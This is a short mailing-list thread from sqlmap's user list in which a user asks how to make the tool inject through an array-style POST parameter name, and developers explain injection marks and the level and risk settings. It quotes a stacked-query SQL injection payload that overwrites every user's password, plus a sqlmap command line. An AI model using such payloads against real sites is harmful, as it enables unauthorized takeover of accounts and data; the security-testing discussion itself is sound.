Nope, shouldn't have anything to do with it. How do you know it is exploitable?
You also haven't tried upping the level with --level=5 which is different from
risk
Sent from a computer
> On Oct 25, 2014, at 1:41 AM, a dehqan <dehqa...@gmail.com> wrote:
>
> Hi
>
>
> Thanks;
>
> Yes of course it's exploitable .
>
> As you see i have used --risk=3 before.
>
> I think Sqlmap isn't able to handle it properly because there is custom
> injection in name of parameter and also name is an array .
> Any Opinion ?
>
>
> Regards dehqan
>
>> On Fri, Oct 24, 2014 at 4:00 AM, Ryan Sears <rdse...@mtu.edu> wrote:
>> // Grrr, stupid gmail. Didn't reply-all first time :-P
>>
>> Are you sure it's exploitable? Try upping the --level and --risk.
>>
>> The #1* means the first * character you put into the --data parameter. It's
>> in lieu of saying something like "POST parameter 'derp' is not exploitable"
>> if you pass in --data="derp=testme" and ask it to test the "derp" parameter.
>>
>> Ryan
>>
>>> On Thu, Oct 23, 2014 at 5:14 AM, a dehqan <dehqa...@gmail.com> wrote:
>>> Thanks man ;
>>>
>>> I want to send an array with query in its index as value of "name" POST
>>> variable .
>>>
>>> Remember if i want inject it manually should try >
>>> <input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass=
>>> 'test123'; -- ]" value="" size="60" maxlength="60" class="form-text
>>> required error">
>>>
>>> So tried (sqlmap/1.0-dev) :
>>>
>>> python sqlmap.py -u "http://localhost//?id=n&ssid=w"; --data="name[0*]=name"
>>> --risk=3 --flush-session --dbms=mysql
>>>
>>>
>>> Sqlmap returns this error:
>>>
>>> [WARNING] (custom) POST parameter '#1*' is not injectable
>>>
>>> What does # mean here ?
>>>
>>> And how to make it work under sqlmap ?
>>>
>>> Regards
>>>
>>>> On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar
>>>> <miroslav.stam...@gmail.com> wrote:
>>>> Hi.
>>>>
>>>> You need to put a custom injection mark * at the place where you want
>>>> sqlmap to inject. For example:
>>>>
>>>> ...name[1*]
>>>>
>>>> Bye
>>>>
>>>> p.s. your example with SELECT is not a proper one as queries are usually
>>>> not supported in stacking
>>>>
>>>>> On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <dehqa...@gmail.com> wrote:
>>>>> Hi Guys ,
>>>>>
>>>>> Is Sqlmap able to send an array instead of string while injecting?
>>>>>
>>>>> Like situation we have html form and we want manually send post variable
>>>>> 'name' this way (value is obtained from array) :
>>>>>
>>>>> name="name[1 ;select * from users -- ]
>>>>>
>>>>> I want do it with Sqlmap , but how ?
>>>>>
>>>>>
>>>>> Regards dehqan
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>>
>>> ------------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>
> ------------------------------------------------------------------------------
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
